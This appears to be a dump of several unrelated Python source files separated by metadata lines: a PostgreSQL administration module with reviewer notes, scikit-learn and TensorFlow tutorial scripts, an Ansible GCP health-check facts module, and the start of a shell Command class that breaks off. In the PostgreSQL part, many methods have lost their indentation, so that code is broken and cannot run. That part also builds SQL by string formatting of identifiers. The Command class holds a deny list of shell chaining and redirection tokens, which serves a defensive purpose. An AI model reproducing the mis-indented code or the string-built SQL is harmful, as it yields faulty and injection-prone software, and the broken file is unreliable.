    """Report the PostgreSQL service status by probing it with pg_isready."""

    HOST = 'localhost'

    def __init__(self, tools_dir):
        """:param tools_dir: directory holding the version-specific
            PostgreSQL binaries (pg_isready is not in /usr/bin on all
            distributions).
        """
        super(PgSqlAppStatus, self).__init__()
        self._cmd = guestagent_utils.build_file_path(tools_dir, 'pg_isready')

    def _get_actual_db_status(self):
        """Probe the server and map the result to a ServiceStatus.

        pg_isready exits non-zero when the server rejects or does not
        answer connections, which surfaces as ProcessExecutionError.
        """
        try:
            utils.execute_with_timeout(
                self._cmd, '-h', self.HOST, log_output_on_error=True)
            return instance.ServiceStatuses.RUNNING
        except exception.ProcessExecutionError:
            return instance.ServiceStatuses.SHUTDOWN
        except utils.Timeout:
            return instance.ServiceStatuses.BLOCKED
        except Exception:
            LOG.exception(_("Error getting Postgres status."))
            return instance.ServiceStatuses.CRASHED
        # NOTE: a trailing "return ServiceStatuses.SHUTDOWN" used to follow
        # here; it was unreachable (every path above returns) and was removed.
class PgSqlAdmin(object):
    """Administrative interface to the local PostgreSQL server.

    All operations are executed over a localhost connection opened as the
    given administrative user.
    """
    # Default set of options of an administrative account.
    ADMIN_OPTIONS = (
        'SUPERUSER', 'CREATEDB', 'CREATEROLE', 'INHERIT', 'REPLICATION',
        'LOGIN'
    )
    def __init__(self, user):
        """Open a localhost connection as *user* on the configured port."""
        port = cfg.get_configuration_property('postgresql_port')
        self.__connection = PostgresLocalhostConnection(user.name, port=port)
    def grant_access(self, context, username, hostname, databases):
        """Give a user permission to use a given database.
        The username and hostname parameters are strings.
        The databases parameter is a list of strings representing the names of
        the databases to grant permission on.
        NOTE: hostname is accepted for interface compatibility but is not
        used by PostgreSQL grants.
        """
        for database in databases:
            LOG.info(
                _("{guest_id}: Granting user ({user}) access to database "
                  "({database}).").format(
                      guest_id=CONF.guest_id,
                      user=username,
                      database=database,)
            )
            self.psql(
                pgsql_query.AccessQuery.grant(
                    user=username,
                    database=database,
                ),
                timeout=30,
            )
    def revoke_access(self, context, username, hostname, database):
        """Revoke a user's permission to use a given database.
        The username and hostname parameters are strings.
        The database parameter is a string representing the name of the
        database.
        NOTE: hostname is accepted for interface compatibility but is not
        used by PostgreSQL grants.
        """
        LOG.info(
            _("{guest_id}: Revoking user ({user}) access to database"
              "({database}).").format(
                  guest_id=CONF.guest_id,
                  user=username,
                  database=database,)
        )
        self.psql(
            pgsql_query.AccessQuery.revoke(
                user=username,
                database=database,
            ),
            timeout=30,
        )
def list_access(self, context, username, hostname):
"""List database for which the given user as access.
Return a list of serialized Postgres databases.
"""
if self.user_exists(username):
return [db.serialize() for db in self._get_databases_for(username)]
raise exception.UserNotFound(username)
    def _get_databases_for(self, username):
        """Return all Postgres databases accessible by a given user.

        Each result row is (name, encoding, collation); whitespace around
        the name is stripped.
        """
        results = self.query(
            pgsql_query.AccessQuery.list(user=username),
            timeout=30,
        )
        return [models.PostgreSQLSchema(
            row[0].strip(), character_set=row[1], collate=row[2])
            for row in results]
def create_database(self, context, databases):
"""Create the list of specified databases.
The databases parameter is a list of serialized Postgres databases.
"""
for database in databases:
self._create_database(
context,
models.PostgreSQLSchema.deserialize_schema(database))
    def _create_database(self, context, database):
        """Create a database.
        :param database: Database to be created.
        :type database: PostgreSQLSchema
        """
        LOG.info(
            _("{guest_id}: Creating database {name}.").format(
                guest_id=CONF.guest_id,
                name=database.name,
            )
        )
        self.psql(
            pgsql_query.DatabaseQuery.create(
                name=database.name,
                encoding=database.character_set,
                collation=database.collate,
            ),
            timeout=30,
        )
def delete_database(self, context, database):
"""Delete the specified database.
"""
self._drop_database(
models.PostgreSQLSchema.deserialize_schema(database))
    def _drop_database(self, database):
        """Drop a given Postgres database.
        :param database: Database to be dropped.
        :type database: PostgreSQLSchema
        """
        LOG.info(
            _("{guest_id}: Dropping database {name}.").format(
                guest_id=CONF.guest_id,
                name=database.name,
            )
        )
        self.psql(
            pgsql_query.DatabaseQuery.drop(name=database.name),
            timeout=30,
        )
def list_databases(self, context, limit=None, marker=None,
include_marker=False):
"""List all databases on the instance.
Return a paginated list of serialized Postgres databases.
"""
dbs = [db.serialize() for db in self._get_databases()]
dblist, marker = pagination.paginate_dict_list(dbs, limit, marker,
include_marker)
return dblist, marker
    def _get_databases(self):
        """Return all non-system Postgres databases on the instance.

        Each result row is (name, encoding, collation).
        """
        results = self.query(
            pgsql_query.DatabaseQuery.list(ignore=self.ignore_dbs),
            timeout=30,
        )
        return [models.PostgreSQLSchema(
            row[0].strip(), character_set=row[1], collate=row[2])
            for row in results]
def create_user(self, context, users):
"""Create users and grant privileges for the specified databases.
The users parameter is a list of serialized Postgres users.
"""
for user in users:
self._create_user(
context,
models.PostgreSQLUser.deserialize_user(user), None)
    def _create_user(self, context, user, encrypt_password=None, *options):
        """Create a user and grant privileges for the specified databases.
        :param user: User to be created.
        :type user: PostgreSQLUser
        :param encrypt_password: Store passwords encrypted if True.
                                 Fallback to configured default
                                 behavior if None.
        :type encrypt_password: boolean
        :param options: Other user options.
        :type options: list
        """
        LOG.info(
            _("{guest_id}: Creating user {user} {with_clause}.")
            .format(
                guest_id=CONF.guest_id,
                user=user.name,
                # The real password is never logged; a placeholder is
                # rendered into the WITH clause instead.
                with_clause=pgsql_query.UserQuery._build_with_clause(
                    '<SANITIZED>',
                    encrypt_password,
                    *options
                ),
            )
        )
        self.psql(
            pgsql_query.UserQuery.create(
                user.name,
                user.password,
                encrypt_password,
                *options
            ),
            timeout=30,
        )
        # Grant the new user access to each database attached to it.
        self._grant_access(
            context, user.name,
            [models.PostgreSQLSchema.deserialize_schema(db)
             for db in user.databases])
    def _create_admin_user(self, context, user, encrypt_password=None):
        """Create *user* with the full set of administrative options."""
        self._create_user(context, user, encrypt_password, *self.ADMIN_OPTIONS)
def _grant_access(self, context, username, databases):
self.grant_access(
context,
username,
None,
[db.name for db in databases],
)
    def list_users(
            self, context, limit=None, marker=None, include_marker=False):
        """List all users on the instance along with their access permissions.
        Return a paginated list of serialized Postgres users.
        """
        users = [user.serialize() for user in self._get_users(context)]
        return pagination.paginate_dict_list(users, limit, marker,
                                             include_marker)
def _get_users(self, context):
    """Return all non-system Postgres users on the instance.

    :returns: list of PostgreSQLUser models, each populated with the
              databases the user can access.
    """
    results = self.query(
        pgsql_query.UserQuery.list(ignore=self.ignore_users),
        timeout=30,
    )
    # Each row's first column is the user name; build a full model per row.
    return [self._build_user(context, row[0].strip()) for row in results]
def _build_user(self, context, username):
    """Build a model representation of a Postgres user.

    Include all databases it has access to.

    :returns: a PostgreSQLUser with its ``databases`` list populated.
    """
    user = models.PostgreSQLUser(username)
    # The setter for DatastoreScema.databases is broken; manually
    # rebuild the list of dbs this user has access to
    dbs = self.list_access(context, username, None)
    for d in dbs:
        user.databases.append(d)
    return user
def delete_user(self, context, user):
    """Delete the specified user.

    The user parameter is a serialized Postgres user.
    """
    deserialized = models.PostgreSQLUser.deserialize_user(user)
    self._drop_user(context, deserialized)
def _drop_user(self, context, user):
    """Drop a given Postgres user.

    :param user: User to be dropped.
    :type user: PostgreSQLUser
    """
    # Postgresql requires that you revoke grants before dropping the user
    dbs = self.list_access(context, user.name, None)
    for d in dbs:
        db = models.PostgreSQLSchema.deserialize_schema(d)
        self.revoke_access(context, user.name, None, db.name)
    LOG.info(
        _("{guest_id}: Dropping user {name}.").format(
            guest_id=CONF.guest_id,
            name=user.name,
        )
    )
    self.psql(
        pgsql_query.UserQuery.drop(name=user.name),
        timeout=30,
    )
def get_user(self, context, username, hostname):
    """Return a serialized representation of a user with a given name.

    ``hostname`` is accepted for interface compatibility and is not used
    by the Postgres implementation.  Returns None when no such user
    exists.
    """
    found = self._find_user(context, username)
    if found is None:
        return None
    return found.serialize()
def _find_user(self, context, username):
    """Lookup a user with a given username.

    Return a new Postgres user instance or None if no match is found.
    (NOTE(review): the original docstring said "raise", but the code
    returns None on a miss -- callers already check for None.)
    """
    results = self.query(
        pgsql_query.UserQuery.get(name=username),
        timeout=30,
    )
    if results:
        return self._build_user(context, username)
    return None
def user_exists(self, username):
    """Return whether a given user exists on the instance."""
    matches = self.query(
        pgsql_query.UserQuery.get(name=username),
        timeout=30,
    )
    if matches:
        return True
    return False
def change_passwords(self, context, users):
    """Change the passwords of one or more existing users.

    The users parameter is a list of serialized Postgres users.
    """
    for serialized in users:
        deserialized = models.PostgreSQLUser.deserialize_user(serialized)
        self.alter_user(context, deserialized, None)
def alter_user(self, context, user, encrypt_password=None, *options):
    """Change the password and options of an existing users.

    :param user: User to be altered.
    :type user: PostgreSQLUser
    :param encrypt_password: Store passwords encrypted if True.
                             Fallback to configured default
                             behavior if None.
    :type encrypt_password: boolean
    :param options: Other user options.
    :type options: list
    """
    LOG.info(
        _("{guest_id}: Altering user {user} {with_clause}.")
        .format(
            guest_id=CONF.guest_id,
            user=user.name,
            # The real password is replaced by a placeholder so it is
            # never written to the logs.
            with_clause=pgsql_query.UserQuery._build_with_clause(
                '<SANITIZED>',
                encrypt_password,
                *options
            ),
        )
    )
    self.psql(
        pgsql_query.UserQuery.alter_user(
            user.name,
            user.password,
            encrypt_password,
            *options),
        timeout=30,
    )
def update_attributes(self, context, username, hostname, user_attrs):
    """Change the attributes of one existing user.

    The username and hostname parameters are strings.
    The user_attrs parameter is a dictionary in the following form:

        {"password": "", "name": ""}

    Each key/value pair in user_attrs is optional.

    :raises exception.TroveError: if the renamed user cannot be found
                                  again after the rename.
    """
    user = self._build_user(context, username)
    new_username = user_attrs.get('name')
    new_password = user_attrs.get('password')
    if new_username is not None:
        self._rename_user(context, user, new_username)
        # Make sure we can retrieve the renamed user.
        user = self._find_user(context, new_username)
        if user is None:
            raise exception.TroveError(_(
                "Renamed user %s could not be found on the instance.")
                % new_username)
    # The password change (if any) is applied to the post-rename user.
    if new_password is not None:
        user.password = new_password
        self.alter_user(context, user)
def _rename_user(self, context, user, new_username):
    """Rename a given Postgres user and transfer all access to the
    new name.

    :param user: User to be renamed.
    :type user: PostgreSQLUser
    :param new_username: the name to rename the user to.
    :type new_username: string
    """
    LOG.info(
        _("{guest_id}: Changing username for {old} to {new}.").format(
            guest_id=CONF.guest_id,
            old=user.name,
            new=new_username,
        )
    )
    # PostgreSQL handles the permission transfer itself.
    self.psql(
        pgsql_query.UserQuery.update_name(
            old=user.name,
            new=new_username,
        ),
        timeout=30,
    )
def psql(self, statement, timeout=30):
    """Execute a non-returning statement (usually DDL);
    Turn autocommit ON (this is necessary for statements that cannot run
    within an implicit transaction, like CREATE DATABASE).

    NOTE(review): the ``timeout`` argument is accepted but never passed
    on to the underlying connection -- presumably a leftover; confirm
    before relying on it.
    """
    return self.__connection.execute(statement)
def query(self, query, timeout=30):
    """Execute a query and return the result set.

    NOTE(review): ``timeout`` is accepted but not forwarded to the
    connection -- confirm whether callers depend on it.
    """
    return self.__connection.query(query)
@property
def ignore_users(self):
    # System/reserved user names excluded from listings, from config.
    return cfg.get_ignored_users()
@property
def ignore_dbs(self):
    # System/template database names excluded from listings, from config.
    return cfg.get_ignored_dbs()
class PostgresConnection(object):
    """Thin psycopg2 wrapper that opens a fresh connection per statement."""

    def __init__(self, **connection_args):
        # Keyword arguments forwarded verbatim to psycopg2.connect().
        self._connection_args = connection_args

    def execute(self, statement, identifiers=None, data_values=None):
        """Execute a non-returning statement.

        Runs with autocommit enabled so statements that cannot run inside
        an implicit transaction (e.g. CREATE DATABASE) succeed.
        """
        self._execute_stmt(statement, identifiers, data_values, False,
                           autocommit=True)

    def query(self, query, identifiers=None, data_values=None):
        """Execute a query and return the full result set as a list."""
        return self._execute_stmt(query, identifiers, data_values, True)

    def _execute_stmt(self, statement, identifiers, data_values, fetch,
                      autocommit=False):
        """Open a connection, run one statement, optionally fetch rows.

        :raises exception.UnprocessableEntity: if ``statement`` is empty.
        """
        if not statement:
            raise exception.UnprocessableEntity(_("Invalid SQL statement: %s")
                                                % statement)

        # Bug fix: psycopg2's connection context manager only wraps a
        # transaction -- it does NOT close the connection on exit, so the
        # original code leaked one server connection per statement.  Wrap
        # the connection in closing() so it is always released, while the
        # inner ``with`` keeps the original commit/rollback semantics.
        from contextlib import closing

        with closing(psycopg2.connect(**self._connection_args)) as raw_conn:
            with raw_conn as connection:
                connection.autocommit = autocommit
                with connection.cursor() as cursor:
                    cursor.execute(
                        self._bind(statement, identifiers), data_values)
                    if fetch:
                        return cursor.fetchall()

    def _bind(self, statement, identifiers):
        # Identifiers (table/column names) cannot be bound as SQL
        # parameters, so they are spliced into the statement text.
        if identifiers:
            return statement.format(*identifiers)
        return statement
class PostgresLocalhostConnection(PostgresConnection):
    """PostgresConnection preconfigured for the local (loopback) server."""

    HOST = 'localhost'

    def __init__(self, user, password=None, port=5432):
        # 5432 is the standard PostgreSQL listener port.
        super(PostgresLocalhostConnection, self).__init__(
            user=user, password=password,
            host=self.HOST, port=port)
| apache-2.0 |
BiaDarkia/scikit-learn | examples/plot_multioutput_face_completion.py | 79 | 2986 | """
==============================================
Face completion with a multi-output estimators
==============================================
This example shows the use of multi-output estimator to complete images.
The goal is to predict the lower half of a face given its upper half.
The first column of images shows true faces. The next columns illustrate
how extremely randomized trees, k nearest neighbors, linear
regression and ridge regression complete the lower half of those faces.
"""
print(__doc__)

import numpy as np
import matplotlib.pyplot as plt

from sklearn.datasets import fetch_olivetti_faces
from sklearn.utils.validation import check_random_state

from sklearn.ensemble import ExtraTreesRegressor
from sklearn.neighbors import KNeighborsRegressor
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import RidgeCV

# Load the faces datasets
data = fetch_olivetti_faces()
targets = data.target

# Flatten each 64x64 image into a 4096-element feature vector.
data = data.images.reshape((len(data.images), -1))
# Olivetti has 40 subjects (targets 0-39); train on the first 30 and
# test on the remaining 10 so train and test never share a person.
train = data[targets < 30]
test = data[targets >= 30]  # Test on independent people

# Test on a subset of people
n_faces = 5
rng = check_random_state(4)
face_ids = rng.randint(test.shape[0], size=(n_faces, ))
test = test[face_ids, :]

n_pixels = data.shape[1]
# Upper half of the faces
X_train = train[:, :(n_pixels + 1) // 2]
# Lower half of the faces
y_train = train[:, n_pixels // 2:]
X_test = test[:, :(n_pixels + 1) // 2]
y_test = test[:, n_pixels // 2:]

# Fit estimators
ESTIMATORS = {
    "Extra trees": ExtraTreesRegressor(n_estimators=10, max_features=32,
                                       random_state=0),
    "K-nn": KNeighborsRegressor(),
    "Linear regression": LinearRegression(),
    "Ridge": RidgeCV(),
}

# Each estimator acts as a multi-output regressor: it predicts every
# lower-half pixel at once from the upper-half pixels.
y_test_predict = dict()
for name, estimator in ESTIMATORS.items():
    estimator.fit(X_train, y_train)
    y_test_predict[name] = estimator.predict(X_test)

# Plot the completed faces
image_shape = (64, 64)

# One column of ground-truth faces plus one column per estimator.
n_cols = 1 + len(ESTIMATORS)
plt.figure(figsize=(2. * n_cols, 2.26 * n_faces))
plt.suptitle("Face completion with multi-output estimators", size=16)

for i in range(n_faces):
    # Column 1: the true face (upper + lower halves stitched together).
    true_face = np.hstack((X_test[i], y_test[i]))

    if i:
        sub = plt.subplot(n_faces, n_cols, i * n_cols + 1)
    else:
        # Only the first row carries column titles.
        sub = plt.subplot(n_faces, n_cols, i * n_cols + 1,
                          title="true faces")

    sub.axis("off")
    sub.imshow(true_face.reshape(image_shape),
               cmap=plt.cm.gray,
               interpolation="nearest")

    # Remaining columns: true upper half + each estimator's prediction.
    for j, est in enumerate(sorted(ESTIMATORS)):
        completed_face = np.hstack((X_test[i], y_test_predict[est][i]))

        if i:
            sub = plt.subplot(n_faces, n_cols, i * n_cols + 2 + j)
        else:
            sub = plt.subplot(n_faces, n_cols, i * n_cols + 2 + j,
                              title=est)

        sub.axis("off")
        sub.imshow(completed_face.reshape(image_shape),
                   cmap=plt.cm.gray,
                   interpolation="nearest")

plt.show()
| bsd-3-clause |
codrut3/tensorflow | tensorflow/examples/tutorials/mnist/mnist_softmax_xla.py | 37 | 3631 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Simple MNIST classifier example with JIT XLA and timelines.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import sys
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
from tensorflow.python.client import timeline
FLAGS = None
def main(_):
    """Train a softmax-regression MNIST classifier, optionally under XLA
    JIT compilation, dump a Chrome trace of the final training step to
    timeline.ctf.json, and print test-set accuracy."""
    # Import data
    mnist = input_data.read_data_sets(FLAGS.data_dir)

    # Create the model
    x = tf.placeholder(tf.float32, [None, 784])
    w = tf.Variable(tf.zeros([784, 10]))
    b = tf.Variable(tf.zeros([10]))
    y = tf.matmul(x, w) + b

    # Define loss and optimizer
    y_ = tf.placeholder(tf.int64, [None])

    # The raw formulation of cross-entropy,
    #
    #   tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(tf.nn.softmax(y)),
    #                                 reduction_indices=[1]))
    #
    # can be numerically unstable.
    #
    # So here we use tf.losses.sparse_softmax_cross_entropy on the raw
    # logit outputs of 'y', and then average across the batch.
    cross_entropy = tf.losses.sparse_softmax_cross_entropy(labels=y_, logits=y)
    train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)

    config = tf.ConfigProto()
    jit_level = 0
    if FLAGS.xla:
        # Turns on XLA JIT compilation.
        jit_level = tf.OptimizerOptions.ON_1

    config.graph_options.optimizer_options.global_jit_level = jit_level
    run_metadata = tf.RunMetadata()
    sess = tf.Session(config=config)
    tf.global_variables_initializer().run(session=sess)

    # Train
    train_loops = 1000
    for i in range(train_loops):
        batch_xs, batch_ys = mnist.train.next_batch(100)

        # Create a timeline for the last loop and export to json to view with
        # chrome://tracing/.
        if i == train_loops - 1:
            sess.run(train_step,
                     feed_dict={x: batch_xs,
                                y_: batch_ys},
                     options=tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE),
                     run_metadata=run_metadata)
            trace = timeline.Timeline(step_stats=run_metadata.step_stats)
            with open('timeline.ctf.json', 'w') as trace_file:
                trace_file.write(trace.generate_chrome_trace_format())
        else:
            sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})

    # Test trained model
    correct_prediction = tf.equal(tf.argmax(y, 1), y_)
    accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
    print(sess.run(accuracy,
                   feed_dict={x: mnist.test.images,
                              y_: mnist.test.labels}))
    sess.close()
# Script entry point: parse the known flags; unparsed args are handed to
# tf.app.run, which invokes main() with them.
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument(
        '--data_dir',
        type=str,
        default='/tmp/tensorflow/mnist/input_data',
        help='Directory for storing input data')
    parser.add_argument(
        '--xla', type=bool, default=True, help='Turn xla via JIT on')
    FLAGS, unparsed = parser.parse_known_args()
    tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| apache-2.0 |
awkspace/ansible | lib/ansible/modules/cloud/google/gcp_compute_health_check_facts.py | 9 | 12633 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ["preview"], 'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_compute_health_check_facts
description:
- Gather facts for GCP HealthCheck
short_description: Gather facts for GCP HealthCheck
version_added: 2.7
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
filters:
description:
- A list of filter value pairs. Available filters are listed here U(https://cloud.google.com/sdk/gcloud/reference/topic/filters.)
- Each additional filter in the list will act be added as an AND condition (filter1
and filter2) .
extends_documentation_fragment: gcp
'''
EXAMPLES = '''
- name: a health check facts
gcp_compute_health_check_facts:
filters:
- name = test_object
project: test_project
auth_kind: serviceaccount
service_account_file: "/tmp/auth.pem"
'''
RETURN = '''
items:
description: List of items
returned: always
type: complex
contains:
checkIntervalSec:
description:
- How often (in seconds) to send a health check. The default value is 5 seconds.
returned: success
type: int
creationTimestamp:
description:
- Creation timestamp in RFC3339 text format.
returned: success
type: str
description:
description:
- An optional description of this resource. Provide this property when you create
the resource.
returned: success
type: str
healthyThreshold:
description:
- A so-far unhealthy instance will be marked healthy after this many consecutive
successes. The default value is 2.
returned: success
type: int
id:
description:
- The unique identifier for the resource. This identifier is defined by the
server.
returned: success
type: int
name:
description:
- Name of the resource. Provided by the client when the resource is created.
The name must be 1-63 characters long, and comply with RFC1035. Specifically,
the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
returned: success
type: str
timeoutSec:
description:
- How long (in seconds) to wait before claiming failure.
- The default value is 5 seconds. It is invalid for timeoutSec to have greater
value than checkIntervalSec.
returned: success
type: int
unhealthyThreshold:
description:
- A so-far healthy instance will be marked unhealthy after this many consecutive
failures. The default value is 2.
returned: success
type: int
type:
description:
- Specifies the type of the healthCheck, either TCP, SSL, HTTP or HTTPS. If
not specified, the default is TCP. Exactly one of the protocol-specific health
check field must be specified, which must match type field.
returned: success
type: str
httpHealthCheck:
description:
- A nested object resource.
returned: success
type: complex
contains:
host:
description:
- The value of the host header in the HTTP health check request.
- If left empty (default value), the public IP on behalf of which this health
check is performed will be used.
returned: success
type: str
requestPath:
description:
- The request path of the HTTP health check request.
- The default value is /.
returned: success
type: str
response:
description:
- The bytes to match against the beginning of the response data. If left
empty (the default value), any response will indicate health. The response
data can only be ASCII.
returned: success
type: str
port:
description:
- The TCP port number for the HTTP health check request.
- The default value is 80.
returned: success
type: int
portName:
description:
- Port name as defined in InstanceGroup#NamedPort#name. If both port and
port_name are defined, port takes precedence.
returned: success
type: str
proxyHeader:
description:
- Specifies the type of proxy header to append before sending data to the
backend, either NONE or PROXY_V1. The default is NONE.
returned: success
type: str
httpsHealthCheck:
description:
- A nested object resource.
returned: success
type: complex
contains:
host:
description:
- The value of the host header in the HTTPS health check request.
- If left empty (default value), the public IP on behalf of which this health
check is performed will be used.
returned: success
type: str
requestPath:
description:
- The request path of the HTTPS health check request.
- The default value is /.
returned: success
type: str
response:
description:
- The bytes to match against the beginning of the response data. If left
empty (the default value), any response will indicate health. The response
data can only be ASCII.
returned: success
type: str
port:
description:
- The TCP port number for the HTTPS health check request.
- The default value is 443.
returned: success
type: int
portName:
description:
- Port name as defined in InstanceGroup#NamedPort#name. If both port and
port_name are defined, port takes precedence.
returned: success
type: str
proxyHeader:
description:
- Specifies the type of proxy header to append before sending data to the
backend, either NONE or PROXY_V1. The default is NONE.
returned: success
type: str
tcpHealthCheck:
description:
- A nested object resource.
returned: success
type: complex
contains:
request:
description:
- The application data to send once the TCP connection has been established
(default value is empty). If both request and response are empty, the
connection establishment alone will indicate health. The request data
can only be ASCII.
returned: success
type: str
response:
description:
- The bytes to match against the beginning of the response data. If left
empty (the default value), any response will indicate health. The response
data can only be ASCII.
returned: success
type: str
port:
description:
- The TCP port number for the TCP health check request.
- The default value is 443.
returned: success
type: int
portName:
description:
- Port name as defined in InstanceGroup#NamedPort#name. If both port and
port_name are defined, port takes precedence.
returned: success
type: str
proxyHeader:
description:
- Specifies the type of proxy header to append before sending data to the
backend, either NONE or PROXY_V1. The default is NONE.
returned: success
type: str
sslHealthCheck:
description:
- A nested object resource.
returned: success
type: complex
contains:
request:
description:
- The application data to send once the SSL connection has been established
(default value is empty). If both request and response are empty, the
connection establishment alone will indicate health. The request data
can only be ASCII.
returned: success
type: str
response:
description:
- The bytes to match against the beginning of the response data. If left
empty (the default value), any response will indicate health. The response
data can only be ASCII.
returned: success
type: str
port:
description:
- The TCP port number for the SSL health check request.
- The default value is 443.
returned: success
type: int
portName:
description:
- Port name as defined in InstanceGroup#NamedPort#name. If both port and
port_name are defined, port takes precedence.
returned: success
type: str
proxyHeader:
description:
- Specifies the type of proxy header to append before sending data to the
backend, either NONE or PROXY_V1. The default is NONE.
returned: success
type: str
'''
################################################################################
# Imports
################################################################################
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest
import json
################################################################################
# Main
################################################################################
def main():
    """Module entry point: fetch HealthCheck facts and exit with the
    results as ``items``."""
    module = GcpModule(argument_spec=dict(filters=dict(type='list', elements='str')))

    if not module.params['scopes']:
        # Default OAuth scope when the playbook did not supply one.
        module.params['scopes'] = ['https://www.googleapis.com/auth/compute']

    items = fetch_list(module, collection(module), query_options(module.params['filters']))
    # The API wraps results in an 'items' key; normalize a missing/empty
    # wrapper to an empty list.
    if items.get('items'):
        items = items.get('items')
    else:
        items = []
    return_value = {'items': items}
    module.exit_json(**return_value)
def collection(module):
    """Return the healthChecks collection URL for the module's project."""
    url_template = ("https://www.googleapis.com/compute/v1/projects/"
                    "{project}/global/healthChecks")
    return url_template.format(**module.params)
def fetch_list(module, link, query):
    """GET the collection URL with the given filter expression and return
    the parsed JSON body (failing the module on error)."""
    auth = GcpSession(module, 'compute')
    response = auth.get(link, params={'filter': query})
    return return_if_object(module, response)
def query_options(filters):
    """Combine filter expressions into a single GCP filter string.

    Multiple filters are ANDed together by joining them with spaces, each
    wrapped in parentheses as the GCP filter syntax expects.

    :param filters: list of filter expression strings (may be None/empty).
    :returns: the combined filter expression ('' when there are none).
    """
    if not filters:
        return ''

    if len(filters) == 1:
        return filters[0]

    queries = []
    for f in filters:
        # Wrap each expression in parentheses unless it is already fully
        # parenthesized.  The original check used ``and`` between the two
        # character tests, which skipped wrapping any expression that
        # merely *ended* with ')' (e.g. "name = (test)"), producing an
        # ambiguous combined query.  It also applied a redundant
        # ``''.join(f)`` to what is already a string.
        if f.startswith('(') and f.endswith(')'):
            queries.append(f)
        else:
            queries.append("(%s)" % f)
    return ' '.join(queries)
def return_if_object(module, response):
    """Validate an HTTP response and return its JSON body.

    Returns None for 404/204; fails the module on HTTP errors, invalid
    JSON, or a GCP error payload embedded in the body.
    """
    # If not found, return nothing.
    if response.status_code == 404:
        return None

    # If no content, return nothing.
    if response.status_code == 204:
        return None

    try:
        module.raise_for_status(response)
        result = response.json()
    except getattr(json.decoder, 'JSONDecodeError', ValueError) as inst:
        module.fail_json(msg="Invalid JSON response with error: %s" % inst)

    # A 200 response can still carry an error payload; surface it.
    if navigate_hash(result, ['error', 'errors']):
        module.fail_json(msg=navigate_hash(result, ['error', 'errors']))

    return result
# Allow execution as a standalone script (this is how Ansible invokes
# modules).
if __name__ == "__main__":
    main()
| gpl-3.0 |
south-coast-science/scs_core | src/scs_core/control/command.py | 1 | 4918 | """
Created on 11 May 2017
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
https://pymotw.com/2/subprocess/
"""
import os
from collections import OrderedDict
from subprocess import Popen, PIPE, TimeoutExpired
from scs_core.data.json import JSONable, JSONify
# --------------------------------------------------------------------------------------------------------------------
class Command(JSONable):
    """
    A host shell command, together with the stdout, stderr and return
    code captured when it is executed.  Instances are JSON-serialisable
    so a command (and, later, its result) can be transported and
    reconstructed.
    """

    __LIST_CMD = '?'                    # pseudo-command: list the available commands

    # Tokens that would enable interactive sessions, redirection or
    # command chaining -- rejected to keep execution contained.
    __PROHIBITED_TOKENS = ('-i', '--interactive', '<', '>', ';', '|')

    __DEFAULT_TIMEOUT = 30.0            # seconds

    # ----------------------------------------------------------------------------------------------------------------

    @classmethod
    def construct_from_jdict(cls, jdict):
        """Build a Command from its JSON dictionary form, or None."""
        if not jdict:
            return None

        cmd = jdict.get('cmd')
        params = jdict.get('params')

        stdout = jdict.get('stdout')
        stderr = jdict.get('stderr')

        return_code = jdict.get('ret')

        datum = cls(cmd, params, stdout=stdout, stderr=stderr, return_code=return_code)

        return datum

    @classmethod
    def construct_from_tokens(cls, tokens):
        """Build a Command from a token list: the first token is the
        command name, the remainder are its parameters."""
        if not tokens:
            return cls(None, [])

        cmd = tokens[0]
        params = tokens[1:]

        return cls(cmd, params)

    # ----------------------------------------------------------------------------------------------------------------

    def __init__(self, cmd, params, stdout=None, stderr=None, return_code=None):
        """
        Constructor
        """
        self.__cmd = cmd                        # string
        self.__params = params                  # array
        self.__stdout = stdout                  # array of string
        self.__stderr = stderr                  # array of string
        self.__return_code = return_code        # int

    # ----------------------------------------------------------------------------------------------------------------

    def is_valid(self, host):
        """Return True if this command may be executed on the given host:
        the host exposes a command directory, no prohibited token appears
        among the parameters, and the command exists in that directory
        (the list pseudo-command is always permitted)."""
        try:
            host.command_path()
        except NotImplementedError:
            return False

        if set(self.params).intersection(set(Command.__PROHIBITED_TOKENS)):
            return False

        if self.cmd == Command.__LIST_CMD:
            return True

        if self.cmd not in os.listdir(host.command_path()):
            return False

        return True

    def execute(self, host, timeout):
        """Run the command in the host's command directory, capturing its
        output; the list pseudo-command runs 'ls' and JSON-encodes the
        listing.  Returns True on success, False on failure, None for an
        empty command."""
        if not self.cmd:
            return None

        try:
